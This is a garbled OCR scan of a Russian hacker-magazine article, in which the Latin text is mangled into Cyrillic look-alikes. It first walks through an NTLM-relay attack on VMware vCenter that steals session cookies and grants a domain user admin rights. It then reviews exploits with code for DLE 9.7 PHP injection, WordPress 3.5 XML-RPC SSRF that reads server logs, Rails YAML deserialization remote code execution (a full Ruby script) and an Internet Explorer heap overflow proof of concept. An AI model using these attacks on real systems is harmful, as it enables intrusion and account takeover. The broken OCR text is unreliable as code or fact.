То ЛгесОу тападе а япдіе Ьо$1, епіег іНе ІР а<Иге$5 ог Ьоз( пат 
То тападе тиІЬрІе Ьо$1з, епіег И* ІР аскігезз ог пате о? а 
ѵСепІег Зегѵег. 



ІР агкігезз /Иате: 



Г” ц$е \Ѵюск>\ѵ5 сг«іепьа!$ 



О СоппесОпд.. 



тзі аихіііагу (ѵтг.ѵаге 



зеззіог._гійег) > 

’псср_пс1тге1ау - N111-1 Яедиезс '/а' Ггот 172.16.0.175:23923 
Ьсср_пс1тге1ау - Зедіппіпд N711-1 Яеіау. . . 

Ьсср_пс1тге1ау - Не дос ѵгоѵаге зоар соокіе: 

Йсср_псітге1ау - ѵтѵ;аге_зоар_зеззіоп= ,, 52і8366й-а537-8а34-3574-О7ООсГ4Ь8і0й" 
Ь.сср_пс1тге1ау - Зепйіпд суре 3 гедиезс ѵісЬ соокіе . . . 

Ьсср_пс1тге1ау - АисЬ зиссеззГиі! 

Ьсср_пс1тге1ау - Зес зоар ій іп ѵтѵаге зеззіоп гійег тосіиіе: 
п с ср_п с Ітг е 1 а у - 52Ю366й-а537-8а34-3574-0700с^Ь8Юй 
<ес ЗОАРЮ 52І3366й-а537-8а34-357$-07ООс«Ь8Юй 
ЗОАРЮ => 52і8366й-а537-За34-3574-0700сі4Ъ8І0й 
хпзі аихіііагу (ѵтгл;аге_зеззіог._пйег) > гип 
50АРЮ 52і8366сі-а537-8а34-3574-0700сГ«ЬЗЮсі 



172.16.0.175 

172.16.0.175 

172.16.0.175 

172.16.0.175 

172.16.0.175 

172.16.0.175 

172.16.0.175 

172.16.0.175 



Зегѵег зеагеей. 



ЙР 



№1Веап5 ГОЕ 
6.8 



Рис. 2. Получаем аутентифицированные куки через ЫИИ геіау и используем их для входа в ѵСепІег 



подключиться к этому модулю (он открывает порт), а в качестве 
входных параметров этому модулю — аутентифицированные куки 
и адрес ѵСепІег-сервера, то ѵтѵѵаге_зез5Іоп_гісісІег будет прок- 
сировать запросы от ѵБрЬеге СІіепІ и подменять на лету значения 
куки. Таким образом, с его помощью мы сможем получить стан- 
дартный доступ к ѵСепІег. Очень круто. Минусы у этого варианта 
в том, что, во-первых, из-за проксирования ѵБрЬеге СІіепІ работает 
прилично медленней, а во-вторых, в том, что нельзя полностью 
автоматизировать процесс (в смысле по-простому нельзя). То есть, 
поставив «ловушку» первым модулем, мы будем ждать, когда 
админ на нее зайдет. Но, как только он зайдет и сервер аутенти- 
фицирует наши куки, у нас будет не очень много времени (время 
жизни сессии вроде десять минут), чтобы скопировать их из одного 
модуля в другой и запустить ѵБрЬеге СІіепІ. 

Именно из-за этих минусов я включил в модуль возможность 
добавлять любого доменного пользователя в админы ѵСепІег. 

По сути, это один БОАР-запрос с именем юзера, которому надо 
выставить админские права. После этого можно входить обычным 
ѵБрЬеге СІіепІ. Конечно, минус тут в том, что надо иметь учетку хотя 
бы от одного доменного юзера. 

Практика. Запускаем МИМ Реіау: 

1. скинуть ѴА5Т0 и мой модульваихіііагу/зегѵег/в МБР; 

2. изе аихіІіагу/зегѵег/ѵтаиІЬ_пІІтгеІау; 

3. зеіРНОБТ 192.168.0.1 (ІР-адрес ѵСепІег); 

4. зеіБРѴРОВТ 80 (порт, на котором будет поднят веб-сервер для за- 
проса МИМ-аутентификации); 

5. зеШРІРАТН/ЮРІ., для запроса (МИМ-аутентификации); 

6. зеі ИБЕРМАМЕ согр/Ьаскег (имя пользователя, которому будут- 
даны права Асітіпізігаіог. Опционально); 

7. гип. 



Ждем админа. Когда все будет успешно сделано, нам отобразят- 
ся куки ѵтѵѵаге_5оар_зе55Іоп, они же 50АРЮ (см. рис. 2). Далее: 

1. изе изе аихіІіагу/зегѵег/ѵтѵѵаге_5е55Іоп_гісІег; 

2. зеі РН05Т 192.168.0.1 (ІРадрес ѵСепІег); 

3. зеі 5РѴР0РТ 9999 (локальный порт, на котором прокси будет 
ждать подключения ѵБрЬеге СІіепІ); 

4. зеі БОДРЮ ѵтѵѵаге_зоар_5ез5Іоп (вставляем куки из предыду- 
щего модуля); 

5. гип; 

6. Запускаем ѵБрЬеге СІіепІ; 

• хост: ІосаІНозІ:9999; 

• парольилогин — Ьураззте. 

Стоит отметить, что мой модуль ѵтаиІЬ_пІІтгеІау еще нужно 
подретушировать, хотя функции свои он уже выполняет. К сожа- 
лению, не уверен, войдет ли он в официальную поставку МБР, или, 
как ѴА5Т0, надо будет качать ручками. Хотя возможно, он и станет 
частью ѴА5Т0, так как переговоры с Клаудио уже движутся. 

Если же говорить об «исправлении» этой баги, то ждать этого 
нам не приходится. Перед публикацией материала я как раз свя- 
зался с ѴМѵѵаге, но единственное, что они смогли сделать, — раз- 
вести руками и сказать, что это бага Місгозоіі и исправить никак 
не могут. Но пообещали составить список рекомендаций для кли- 
ентов банка. Місгозоіі же исправлять ситуацию точно никак 
не будет, а будет перетягивать на более совершенные технологии. 
Однако с учетом обратной совместимости МИМ геіау можно будет 
активно использовать ещё лет 10... 

Вот и все. Надеюсь, было интересно. Кстати, если хочешь что- 
нибудь поресерчить или думаешь стать пентестером, но не знаешь 
как и что — напиши мне, и я постараюсь тебе помочь :). Удачи! 
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ВЗЛОМ/ОБЗОР эксплойтов 



Сергей Белое ІзегдеуЬеІоѵе.ги) 





Ломаем самое популярное — РиЬуоп Раііз, 
все версии Іпіегпеі Ехріогег, ѴѴогсІРгезз, 
ОаІаИ^е Епдіпе. Держись крепче! 



К7ШГЯ 

Вся информация 
предоставлена 
исключительно 
в ознакомитель- 
ных целях. 

Ни редакция, 
ни автор не несут 
ответственности 
за любой воз- 
можный вред, 
причиненный 
материалами 
данной статьи. 



эксплоитов 



АНАЛИЗ СВЕЖЕНЬКИХ УЯЗВИМОСТЕЙ 



■ Инъекция РНР-кода в РІ.Е 9.7 



СѴББѴ2 О 



АѴ: Ы/АСіМ/АЦІіМ/С : С/І : С/А: С/Е : 10/Р Б:\Л//РС : С 

Дата релиза: 28 января 2013 года 
Автор: ЕдіХ 
СѴЕ: 2013-1412 

Уязвимость в йІ_Е 9.7 (ргеѵіеѵѵ.рЬр) позволяетудаленному пользо- 
вателю выполнить произвольный код на целевой системе. 

ЦЦЛОН 

РІ-Е ЮаІаІ_йе Епдіпе) — очень популярный движок для новостных сай- 
тов. Полюбился многим за свою функциональность, дизайн и удобную 
админку, поэтому и получил широкое распространение. Давно в нем 
не обнаруживали уязвимостей, и вот — РНР-инъекция! 

ргеѵіем.рИр 

$с_И5Т = ітріосіе (V, $_КЕдЦЕ5Т[ 1 саІІІБІ: 1 ] ); 
і-Р(5ТгроБ( $Тр1->сору_Тетр1а-1:е, и [саТ1і5*=") !== -РаІБе) { 
$Тр1->сору_1:етр1а1:е * рге§_гер1асе( "#\\[саШ$^=(.+?)\\]^ 
( - * ? )\\[/са1:1і5І:\\]#іе5" , "сЬеск^аТевогуС’ХХГ, ‘ \\2 ’ 
’{$с ііб*}')”, $Тр1->сору_Тетр1аТе ); 

} 

і-Р(5Т^роБ($1:р1->сору_Т:етр1а1:е ^ и [по•і:-са•С1І5•С= ,, ) !== -РаІБе) { 
$Тр1->сору_Тетр1а1:е = рге§_гер1асе( н #\\[по1:-саТ:1і5Т=^ 
(.-»-?) \\] ( .*?)\\[/по*-са-Ш5*\\]#іеБ", и сЬеск_са1:е§огу«~' 



( * \\1 ' , ’ \\2 ' , ’{$с ІіБІ:}’, -РаІБе) " , $Тр1 - >сору_Тетр1аТе) ; 

} 

Параметр $_РЕ0иЕБТ[ , саІІІ5І*], который поступаетна вход 
отпользователя, недостаточнообрабатывается фильтрами 
и подставляется в функцию ргед_герІасе, вызываемую с моди- 
фикатором «е». Данный кейс может быть использован для вне- 
дрения РНР-кода (подробно о модификаторах можно прочитать 
по ссылке: ЫЫу/ЩЩк). Стоитупомянуть, что, в принципе, это 
нерекомендуемый модификатор и в РНР5.5.0 он будетпомечен 
какустаревший. 

т-ши 

РІ.Е9.7. 

шшв 

Применить патч для 9.7 или обновиться до 9.8. 

55ВР в\Л/огсіРге55 3.5 



СѴ55Ѵ2 Ы/А 



(М/А) 

ЕЗВЗ 

Дата релиза:4 января 2013 года 
Автор: ОИзес гезеагсЬ ІаЬ 
СѴЕ: Ы/А 

Подделываем запросы на серверной стороне в Ѵ/огбРгезз 3.5. 
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\шъ\и 

Система блогов ѴѴогЬРгезз не нуждается в представлении. Сейчас 
почти каждый, ктособирается завести блог, выбираетименно 
ѴѴогсІРгезз. В начале этого года на сайте уѵѵѵѵѵ.еЕбісаІбаскЗг.со.ик 
была опубликована статья об использовании ХМЬ-РРС (удаленный 
вызов процедур посредством отправки ХМІ_) в качестве скане- 
ра локальных портов. Но исследователи из лаборатории ОІМзес 
пошли дальше: они использовали найденную уязвимостьдля экс- 
плуатации 55РР — БегѵегБісІе Редиезі Рогдегу. Поумолчанию 
ѴѴогЬРгезз задействует сІІРІ_ для выполнения запросов: 

мр-іпс1исІе5/с1а55-мр-хт1грс-5егѵег.рИр 

4988 $1іпеа = мр_гетоТе_-Рореп( $ра§е1іпкесІ-Ргот ); 

мр-іпсІисІез/'РипсТіопБ.рІір 

■РипсТіоп мр_гетоТе_-Рореп( $игі ) { 

$гезроп5е = мр_гетоТе_§еТ( $игі, $орііоп5 ); 

мр-іпсІисІеБ/бТТр.рбр 

74 -Еипсііоп мр_гетоТе_§е1:($иг1, $аг§5 = аггауО) { 

75 $оЬ]Ре1:сИ5і1:е = „мр.ИТІр^е^оЬдесТО; 

76 геіигп $0Ьз‘РеТсб5і1:е->§еТ($иг1, $аг§5); 

22 -рипсТіоп &_мр_ЬТТр_§е1:_оЬдесТ() { 

зТаТіс $бі1:р; 

25 І-Г ( І5_пи11($Ы:Тр) ) 

26 $б«р = аем мр.нпрО; 

мр-іпс1ис1е5/с1а55-И1:Тр.рЬр 

294 -РипсТіоп §еТ($иг1, $аг§з = аггауО) { 

$сІе-Раи1Т5 = аггау( 'теібосГ => 'СЕТ'); 

$г = Ѵф_раг5е_аге5($аге5, $сІе-Раи1Т5); 
геТигп $Тбі5->гедиеБ-1:($иг1, $г); 

298 } 

81 -Рипсііоп геяие5Т( $иг1, $аг§5 = аггауО ) { 

191 геТиго $ТИі5->_сІІ5раТсИ_гедие5І:($иг1 і $г); 

243 ргіѵаіе Тилс.Ъіоп _гіі5ра1:сб_гедие5Т($иг1, $аг§з) { 
БіаТіс $Тгап5рогТ5 = аггауО; 

$с1а$5 = $ТЬі$->^_§еТ_6г5Т_аѵаі1аЫе_Тгап5рогТ^ 
($аг§5, $игі 

риЫіс -РцпсТіоп _ёеТ_бг5Т_аѵаі1аЫе_Тгап5рог1:^ 
($аг§5, $иг1 = пиіі) 

$гечие5І_огсІег = аггауО сигі' , ' БігеатБ’, «-■ 
'■рБоскореп' ) ; 

Если ты еще не читал «Библию 55РР», то обязательно займись 
этим на досуге (доступна по ссылке: Ы1.1у/УЬ9Х1_3 ). 

Зная, что использование таких схем, как КІе://, дорбег://, сіісі://, 
Ісіар://, можетпривести к довольно печальным последствиям, по- 
пробуем схему ЛІе://. Снова взглянем на код ѴѴогсІРгезз, разберем 
метод РіпдЬаск (например, ты написал статью, и кто-то на другом 
блоге указал ссылку на твою статью. Тебе приходит «ріпдЬаск» — 
отметка в комментариях, что кто-то сослался натебя): 

мр-іпс1исІе5/с1а55-мр-хт1грс-5егѵег.рбр 
$1іпеа = ѵф_гето1:е_-Рореп( $ра§е1іпкесІ-Ргот ); 
і-р ( !$1іпеа ) 

рге§_та1:сб( ' | <^іТ:1е> ( [ л < ] * ? ) </^і"Ь1е> | іб ‘ , $1іпеа, «-* 
$таТсЬ-ЫТ1е); 

$ТіТ1е = $таТсбТіТ1е[1]; 

і-р (етріу($1:і-1:1е)) 

геТигп пей ІХК_Еггог(32, (’Ме саппоТ ЯпсІ а ТШе - 



Сортировать статьи по: ѵ дате | популярности | поседавмости | комментария*! | алфавиту {} 

Добро пожаловать 




ЭІ.Е— многопользовательский новостной движок 

оп ТбаТ ра§е. ' )); 

$1іпеа = 5Тгір_Та§5( $1іпеа, ’<а>' ); 

$р = ехр1осіе( "\п\п и , $1іпеа ); 

$рге§_1:аг§е1: = рге§_диоТе($раёе1іпкесІ1:о, ' 

■Рогеасб ( $р аі $рага ) { 

і-р ( 5ігро5($рага, $ра§е1іпкесІ1:о) !== -Раізе ) { 
ргеё_таТсб( н |<а[ А >]+?" .$ргее_1:агёе1:.- 
”[ Л >]*>([ Л > ]+?)</а>| ", $рага, $сопТехТ); 
і-р ( етріу^сопіехі) ) 

сопііпие; 

$ехсегр1: = ргее_гер1асе( ' |\</?мрсопіехі\> | ' , ", $рага); 
і-р ( 5Тг1еп($сопТехТ[1]) > 100 ) 

(соп{ех{[1] = 5иЬ5І:г($соп1:ех-1:[1], 0, 100) . 

Данные между <№Іе> и </ШІе> будут помещены в поле автора 
комментария (255 байт, ограничены в базе данных). Данные между 
<а> и </а> будут отмечены каксам комментИООбайт, ограничены 
строкой 5022). 

Итак, у нас есть 355 байт для нужных нам данных. Попытаемся 
вытащить данные изассезз.Іод. Для начала запишем данные 
в ассезз.Іод, просто обращаясь к сайту подобными запросами: 

біір : //1оса1бо5і/іе5і5/иогсІрге55/#<1:іі1е> 
біір://1оса1бо5і/іе5*5/могс1рге55/#</ііі1е> 
біір : //ІосаІбоБі/іезІБ/могсІргеББ/#^ 

<а бі1:р://1оса1бо5і/і:е5і:5/могсІрге55/?р=1> 
біір: //1оса1бо5*/іе5і5/могсІрге55/#</а> 

Отправим запрос с маркером, но при этом скрафтим его само- 
стоятельно (браузеры создают НТТР-запросы без якорей). 

СЕТ /Те5І:5/могс1рге55/#<а>тагкег1 НТТР/1.1 
Нобі: ІосаІбоБі 

Теперь можно добавить комментарий (ріпдЬаск) с нужными 
данными между нашими маркерами, используя запрос кХМЬРРС: 

<?хш1 ѵег5Іоп="1.0 н епсосІіпё="І50-8859-1 ,, ?> 
стеібосІСаІЪ 

<те1:босІМате>ріпёЬаск . ріп§</те1:босІМате> 

<рагат5> 

<рагат><ѵа1ие><5Тгіпё>Я1е:///ѵаг/1оё/арасбе2/ассе55_1о§— 

</5І:гіпё></ѵа1ие></рагат> 

<рагатхѵа1ие><5І:гіпё>бТі:р://1оса1бо5Т/-1:е5І:5/могсІрге55/?*-' 
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р=1</5І:гіп§></ѵа1ие></рагат> 

</рагатз> 

</теТІіос1Са11> 



- 1 
- 2 
</Тоо> 



После отправки этого запроса в комментариях к записи мы полу- 
чим нужные нам данные. 

ьшчзц 

ѴѴогсіРгеззЗ.б. 

шшш 

Обновиться до ѴѴогсІРгезз 3.5.1. 



■ 



Удаленное выполнение команд в Раііз 2, 3, 4 



СѴББѴ2 Ш 



(Ы/А) 

Дата релиза: 7 января 2013 года 
Автор: сЬагІізоте, езрез 
СѴЕ:2013-0156 

йоБ, 5СК_і, РСЕ во всех версиях РоР. 



РиЬу оп Раііз — популярный фреймворк, который часто выбирают 
для стартапов, как гибкую и довольно устойчивую к высоким на- 
грузкам платформуінапример, Твиттер изначальнобыл написан 
на РоР). В начале года была обнаружена бага во всех версиях 
этого фреймворка, которая позволяла провести йоБ-атаку, 5С)І_- 
инъекцию или выполнитьлюбой код на целевой системе! Атаку- 
ющему всего лишь требуется отослать специально скрафтенный 
ХМІ_, содержащий в себе ѴАМІ_-объект. Рельсы парсятХМІ. и под- 
гружаютобъектизУАМЬ. В процессе выполнения отправленный 
кодможетвыполниться (зависитоттипа и структуры отправлен- 
ных объектов). Теперь по шагам: 

• Рельсы парсят параметры из запроса, на основе Сопіепі-Туре. 

• ХМЬпарсер (до пропатченных версий) запускает ѴАМІ_-парсер 
для элементов с Іуре="уатГ. Вот пример ХМІ_'ки с ѴАМІ_: 

<Тоо Туре="уат1”> 
уаті: §ое5 беге 
■Роо: 
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Буфер, который можетсодержатьнеболее0хА8 байт 



• ѴАМІ. позволяет десериализовать произвольные РиЬу-объекты. 

• Так как РиЬу динамичен, десериализация УАМЬобъекта может 
вызватькакой-либотриггер, включая методы, которые нужны 
для десериализации этого объекта. 

• Некоторые классы РиЬуприсутствуютво всех приложениях 
на рельсах (например, ЕРВ-шаблон). И их можно использовать 
для выполнения любого РиЬу-кода и, какследствие, любых 
команднасервере. 

ЭксплойтужеестьвМеІазрІоіІ. Можно найти и просто скрипты 
эксплуатации, без привязки как МР. Например, какэтот: 

игі = АРСѴ[0] 

сосіе = Рііе. геасІ(АК(эѴ[1]) 

# Встраиваем ѴАМБ-пейлоад в ХМІ. 

рауіоасі = «с-РАУЮАО.БТгір.бзиЬС’Хп", ”
 н ) 

<Таі1 Туре= м уагп1 н > 

--- ІгиЬу/оЬзесСгЕРВ 
ТетрІаТе: 

$гс: ІЬіпагу |- 
#{Вазе64. епсосіе64( сосіе ) } 

</Таі1> 

РАУЮАй 

# Создание НТТР-запроса 

игі = ІІКІ.раг5е(иг1) 

ИНр = МеТ: :НТТР.пем(игі.Ьо5Т, игі.рогТ) 
і-Р игі.БсЬете == "ЬИрз" 

Ь*і:р.и5е_55І = Тгие 

ЬТТр . ѵегіТу_тос!е = ОрепББІ.: :551.: :ѴЕРІРУ_МСМЕ 
епсі 

гециезТ = :НТТР: :Ро5і.пеѵ</(игі.геяие5Т_игі) 
гециезТрСопТепТ-Туре"] = "ТехТ/хтІ" 
гедие5і["Х-НТТР-МеТІіосІ-0ѵеггісІе"] = "ее!” 
гециеБТ.ЬосІу = рауіоасі 

# Выводим ответ 

гезропзе = ЬТТр. гецие5*(гецие5*) 

риіз "НТТР/1. 1 #{ге5роп$е. сосіе} #{Раск: :ИШ.$ : :*-• 

НТТР_5ТАТи5_С00Е5[ гезропзе .сосіе . Ио_і ] } ” 

гезропБе.еасЬ { |ІіеасІег, ѵа1ие| риі$ "#{ЬеасІег}: 

#{ѵа1ие>" } 

риТ5 

ри*5 гезропзе.ЬосІу 

Бага проверена редакцией — все рабочее :). Схожая ошибка в об- 
работке нашласьеще в ЗБОМ-парсере, эксплойтдля него вышел 
чуть позже. 

Ь 7Т ;ЩЦ 

ВсеверсииРоР. 

ИИ 

Пропатчить Раііз (патчи доступны здесь: ЬіІ.Іу/БіѵРЦо І или просто 
обновить РоР (исправлено в 3.2.11, 3.1.10, 3.0.19, 2.3.15). 




Эксплуатацияуязвимости в РоР 
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/ Эксплуатация Ьеар оѵег Лоѵѵ в Іпіегпеі 
* Ехріогег 



СѴББѴ2 Ы/АІ 



Ш) 

Дата релиза: 10 января 2013 года 

АвторгѴиреп 

СѴЕ: 2012-1876 

Разбор переполнения кучи в ІЕ (с конкурса Р\л/п20ѵѵп 2012). 

цты 

В начале этого года Ѵиреп Бесигііу выложили свой эксплойт 
с конкурса Р\лт20ѵѵп 2012 для ІЕ с обходом йЕР & А5І_Р. Критиче- 
ская уязвимость присутствует во всех версиях ІЕ, включая ІЕЮ под 
ѴѴіп8. Добиться Ьеар оѵегИоѵѵ можно следующим кодом: 

<ЬТт1хЬосІу> 

<ТаЫе 5Ту1е='ЧаЫе-1ауои1: :6хесГ > 

<со1 ісI= ,, 132 ,, місІ1:Ь="41 и 5рап="1" >&пЬзр </со1> 
</ТаЫе> 

<5СГІр1> 

■РипсТіоп оѵег_1гіібег() { 

ѵаг оЬз_со1 = сіоситепі: .ееТЕІетепТВуІсіе’Ізг"); 
оЬз_со1.місІ'Ыі = "42765” ; 
оЬз_со1.$рап = 1000; 

> 

зеТТ ітеоиТ ( " оѵег_Т гі§§ег ( ) ; " , 1 ) ; 

</5СГІр*х/ЬосІух/Н*т1> 

Разбор узлов документа приводит к созданию 
пгі5МтІ!СТаЫеІ_ауоиІ: 

; СеИауоиТРготРасТогу() — тзНТтІ.сІІІ (ІЕ8) 

ЗСЕЕ2706 РІІ5Н 158 // Размер = 344 

ЗСЕЕ270В РІІ5Н 8 // Флаги = НЕАР_2ЕКО_МЕМОКѴ 

ЗСЕЕ270Э РЫ5Н ОИОКО РТК Э5 : [3030447С] // Куча = 00150000 
ЗСЕЕ2713 САН ЕВХ // ГШ)П . КТІАИосаТеНеар 

Во время очередной обработки НТМЬ-дерева ІЕ добавля- 
ет новый столбец внутри таблицы, сославшись на функцию 
т5ЬІтІ!СТаЫеІ_ауоиІ::Ас!сІСоІ() следующим образом: 

; СТаЫеІ_ауои1:: : Ас1сІСо1( ) — шбЫгілі . сііі (ІЕ8) 

ЗСРВ9Е66 РІІ5Н ЕОІ 
ЗСРВ9Е67 МОѴ ЕАХ, Е5І 

ЗСРВ9Е69 САН СТаЬІеСоІ: :СеТААзрап // Получение 5РАІѴ- 

// атрибута 

[...] 

ЗСРВ9ЕР2 СМР ЕАХ,ОЫОКО РТК 55:[АКС.1] 

ЗСРВ9ЕР5 31. 5НОКТ ЗСРВ9Р57 

ЗСРВ9ЕР7 МОѴ ЕАХ,ОЫОКО РТК 05:[ЕВХ+7С] 

ЗСРВ9ЕРА 5НК ЕАХ, 2 

ЗСРВ9ЕРО МОѴ ЕСХ, ЕВХ 

ЗСРВ9ЕРР САП СТаЫеЬауоиТ: :Еп5игеСоІ5 

Последняя функция будетхранить информацию внутри объ- 
екта СТаЫеІ_ауоиІ, как мы можем видеть из следующего кода: 

; СТаЫеЬауоиТ: :Еп5игеСоІ5 — тзЬТтІ.сШ (ІЕ8) 

ЗСЕЕ0371 СМР ОМОКЭ РТК 05: [ЕСХ+54],ЕАХ 
ЗСЕЕ0374 ЗСЕ 5НОКТ ЗСЕЕ0379 
ЗСЕЕ0376 МОѴ ОДОКО РТК 05: [ЕСХ+54] ,ЕАХ 
ЗСЕЕ0379 ХОК ЕАХ, ЕАХ 
ЗСЕЕ037В КЕТМ 



Позже, во время обработки, расположение элемента должно 
быть просчитано при помощи т5МтИСТаЫеІ_ауоиІ::СаІсиІаІеІ_ауо 
иіП, что приводит к вызову следующей функции: 

; СТаЬ1еІ_ауоиТ_Са1си1а1:еІ_ауоиі:() — тзЬТтІ.сЛІ (ІЕ8) 

ЗСР662А9 РІІ5Н ОИОКО РТК 55: [ЮСАІ. . 116] 

ЗСР662АО МОѴ ЕАХ,ОШКО РТК О5:[ЕВХ+60] 

ЗСР662В0 РІІ5Н ОМОКО РТК 55:[АКС.1] 

ЗСР662ВЗ МОѴ ОМОКО РТК 55 : [ ЮСАІ. . 123 ] , ЕОХ 
ЗСР662В7 РСІ5Н ЕВХ 

ЗСР662В8 МОѴ ОМОКО РТК 55: [ЮСАІ,. 117], ЕАХ 
ЗСР662ВС САП СТаЫеІ_ауои1:: :Са1си1а1еМіпМах 

Основная задача этой функции — создать буфер, занести его 
в тзМтІІСТаЫеІ-ауоиІ и заполнить его информацией о стилях 
из столбцов. Процесс начинается с получения БРАІМ-атрибута 
из гп5МтІ!СТаЫеІ_ауоиІ с целью вычисления размера буфера: 

; СТаЫеІауоиТ: :Са1си1а1:еМіпМах() — тзНТтІ.сІІІ (ІЕ8) 
ЗСР66А69 МОѴ ЕВХ,ОМОКО РТК 55:[АКС.1] 

ЗСР66А6С РЦ5Н Е5І 

ЗСР66А6Э МОѴ Е5І,0М0К0 РТК 55:[АКС.2] 

ЗСР66А70 МОѴ ЕАХ,ОШКО РТК 05:[Е5І+28] 

ЗСР66А73 МОѴ ОМОКО РТК 55: [ЮС АС. 36], Е АХ 

ЗСР66А79 МОѴ ЕАХ,ОЫОКО РТК 05:[ЕВХ+54] // Значение 5РАМ- 

// атрибута по 
// смещению +0x54 

ЗСР66А7С МОѴ ІЭЫОКО РТК 55: [АКС.1],ЕАХ // Обновление 

// первого 
// аргумента 

[...] 

ЗСЕЕО309 І_ЕА Е5І,[ЕВХ+90] 

ЗСЕЕО30Р ЗІ_ ЗСРВА54А // [Е5І+8] сейчас содержит 0 
ЗСЕЕ0315 СМР ЕОХ,ОШКО РТК Э5:[Е5І+8] // ЕОХ из Аг§1 

ЗСЕЕЭ318 ЗВЕ 5НОКТ ЗСЕЕЭ320 

ЗСЕЕОЗІА РІІ5Н 1С // Аг§1 = 1С 

ЗСЕЕОЗІС МОѴ ЕАХ, ЕРХ // 5РАМ = 6 

ЗСЕЕРЗІЕ МОѴ ЕОІ, Е5І 

ЗСЕЕО320 САП СІтрІАгу : : Еп5иге5ігеЫогкег // Создание 

// буфера 

СітрІАгу-ЕпвигеБігеѴѴогкегО создастбуфер размером 0хА8 
байт на основе БРАЫ-атрибута. В качестве аргумента он принима- 
етзначениеОхІС, и ЕАХсодержитзначение, котороебыло подано 
через БРАІЧ-атрибут, в нашем случае это 6. Размер равен 0x1 С * 6 = 
0хА8байт: 

; СІтрІАгу: : Еп5иге5ігеИогкег — тзбТтІ.сШ (ІЕ8) 

ЗСР75198 МОѴ ЕАХ,0кЮК0 РТК 55:[ЕВР-4] // ЕАХ содержит 6, 

// [ЕВР+8] - 0x1с 

ЗСР7519В МШ. ЭМОКО РТК 55: [ЕВР+8] // Ѳха8 в ЕАХ 

ЗСР7519Е РІІ5Н ЕЭХ // Аг^г 

ЗСР7519Р РІІ5Н ЕАХ // Аг§1 

ЗСР751А0 ПА ЕАХ,[ЕВР-8] // Получим результат 

ЗСР751АЗ САП ІЛ_оп§І.оп§ТоІЯп1: 

[...] 

ЗСР751В8 РІІ5Н ЭМО КО РТК 55:[ЕВР-8] // Аг§1, 

// ризН 0ха8 

ЗСР751ВВ ПА Е5І, [ЕРІ+0С] 

ЗСР751ВЕ САН НеарКеаІІос 

Вызов НеарРеАІІосО произойдете параметром 0хА8 и изменитука- 
затель на ЕОІ +0хС с ЕОІ = СТаЫеІ_ауоіЛ+0х90. Это означает, что это 
будет буфер со смещением +0х9С из пл5МтІ!СТаЫеІ_ауоИ. В то же 
время МБНТМЫ СТаЫеІ_ауоиІ будет иметь буфер, который может 
содержать не более 0хА8 байт. На следующем листинге показано 
расположение объекта: 
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; Объект ШБбТтІ ! СТаЫеІ_ауои1: 

Адрес Шестнадцатеричный дамп 

023А0498 98 ЗЕ Р7 ЗС|А0 14 22 ѲѲ | Е0 ОЛ 46 02 | В0 73 Р7 ЗС| 

023А04А8 01 00 00 00 | 00 00 00 00 | 00 08 08 01 | РР РР РР РР| 

023А04В8 00 00 00 00 | 00 00 00 00|00 00 00 00|РР РР РР РР| 

023А04С8 94 05 02 00|С4 01 00 00 | 00 00 00 00 | 00 00 00 00 | 

023А04Э8 00 00 00 00 | 02 28 01 00 | 00 00 00 00 | 00 00 00 00 | 

023А04Е8 00 00 00 Ѳ0|06 00 00 00 | 0Ѳ 00 00 00 | РР РР РР РР| 

023А04Р8 00 00 00 00 | РР РР РР РР | 9С Р6 Р6 ЗС|04 00 00 00 | 

023А0508 04 00 00 00 | Э0 06 43 02 | 9С Р6 Р6 ЗС | 18 00 00 00 | 

023А0518 06 00 00 00 | 10 8Э ІА 00 | 00 00 00 00 | С0 78 А1 02 | 

023А0528 9С Р6 Рб ЗС | 00 00 00 00|00 00 00 00|60 14 47 02 1 

023А0538 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 00 00 00 00 | 

[ 98 ЗЕ Р7 ЗС] ѵ-РТаЫе объекта СТаЫеІ-ауоиТ 
[ | 06 00 00 00] Атрибут 5РАМ 
[ 18 00 00 00] Число столбцов * 4 (6 столбцов) 

[ 10 80 ІА 00] Массив ШБбТтІ ІСТаЬІеСоІ 
[ 60 14 47 02] Уязвимый буфер 

Буфер [60 14 47 02] содержит информацию о стилях для шести 
столбцов элемента 5РАІЧ. Это цикл по всем доступным столбцам 
(сосмещением +0x84) и возвращениеБРАМ-атрибута изпервого 
столбца. Позже это значение было изменено следующим кодом: 

<5СКІРТ> 

ѵаг ісІЗ = гіоситепТ.§еТЕ1етепТВуІс!( ,, ісІЗ"); 
ісI3.5рап= и 7 ,, ; 

</5СКІРТ> 

Таким образом, СТаЫеСоІ::6е1АА5рап() возвращает7: 

; СТаЫеЬауоиТ: :Са1си1аТеМіпМах() — гп5бТт1.<Ш (ІЕ8) 
3012ЕВ66 |МОѴ ЕАХ, ОШКО РТР 05:[ЕВХ+84] // Получение 

// массива столбцов 

3012ЕВ6С |МОѴ ЕСХ,ОШКО РТР 55:[ЕВР-8] 

3012ЕВ6Р |МОѴ ЕОІ^ОІлЮРО РТР 05: [ЕСХ*4+ЕАХ] 

[...] 

3012ЕВ90 | САН СТаЬІеСоІ : гбеТААзрап /У Возвращается 

// обновленное 
// значение 
// атрибута 5РАМ (7) 

3012ЕВА2 |СМР ЕАХ, ЗЕ8 

3012ЕВА7 |МОѴ ОЫОРО РТР 55: [ЕВР+10],ЕАХ // Сохранение 

// в АРС.З 




Мг ЖоггіРгма оп С>осотЬвг 5. 2012 оі 9:23 ап» «аЮ 

«. ІГтіз в а соттѳгй. 

То йене а соттепі. дві Іод іп алй ѵіеѵѵ іье розі'з соттегйз. ТЪегѳ 
уоо ѵѵй Ьаѵе іЬе орііоп Іо есй сх йеіеіѳ іЬѳлп. 



РШдЬаск: НТТР/1.1" 200 4507 127.0.0.1 - - [05/ЛШ/201 3:05:34:27 
+0400) *Р05Т Лѳзіз/ѵѵогйргеза/хшігрс.рітр КТТР/1 , 1 * 200 390 
127.0.0.1 - - (05/Эап/201 3:05:34:34 +0400] *РОЗТ 
ЛѳзІзЛѵогйргезз/хгп*грс.рЬр НТТР/1.1" 200 390 127.0.0.1 - - 
[05/Цап/20 13:05:34:35 +04001 ’РО Еа 



І_еаѵе а Реріу 

ЦэддвО іп вв айтіп. Ілд оиі? 



РіпдЬаскс информацией изассе$5.Іод 



[...] 

ЗЭ12ЕС70 | РІІ5Н 0 
ЗР12ЕС72 І РІІ5Н Е5І 
3012ЕС73 ІСАИ. - 

СМісІТІіІІпіТѴаІие: :СеТРіхеІМісИ:б // Возвращает значение 

// на основе атрибута ЫЮТН 
ЗЭ12ЕС78 | СМР ОІлЮКО РТР 55: [ЕВР-60] ,0 
